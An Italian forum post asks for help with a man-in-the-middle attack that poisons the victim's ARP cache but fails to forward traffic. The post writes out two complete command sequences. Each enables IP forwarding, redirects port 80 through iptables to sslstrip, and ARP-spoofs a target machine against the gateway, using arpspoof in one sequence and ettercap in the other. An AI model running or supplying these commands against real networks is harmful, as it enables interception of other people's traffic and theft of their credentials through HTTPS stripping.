ho un bisogno disperato (per la mia sanità mentale, dato che sto impazzendo dietro questo problema da stamattina) di riuscire a capire perchè se faccio un MITM qualsiasi, il traffico non viene rediretto.
Non riesco ne con ettercap (testuale), ne con arpspoof.
Il mitm funziona perchè se vado sul pc vittima a controllare l'arp è effettivamente avvelenata... peccato che abbia causato un bel DOS più che un MITM...
Sslstrip funziona perchè se sul browser del mio pc metto come proxy localhost con la porta di sslstrip (uso la 1000) cattura il traffico senza problemi...
Questa è la procedura con arpspoof, tutto da root ovviamente:
Codice: Seleziona tutto
echo "1" > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward (giusto per controllare)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
sslstrip -l -k 1000
arpspoof -i wlan0 -t IP_VITTIMA IP_GATEWAY
Codice: Seleziona tutto
echo "1" > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward (sempre per controllare)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
sslstrip -l -k 1000
ettercap -i wlan0 -Tq -M ARP:remote /IP_VITTIMA/ //
EDIT: mi era scappato un sudo di troppo... ma in realtà tutti i comandi sono lanciati tutti da root, quindi poco importa...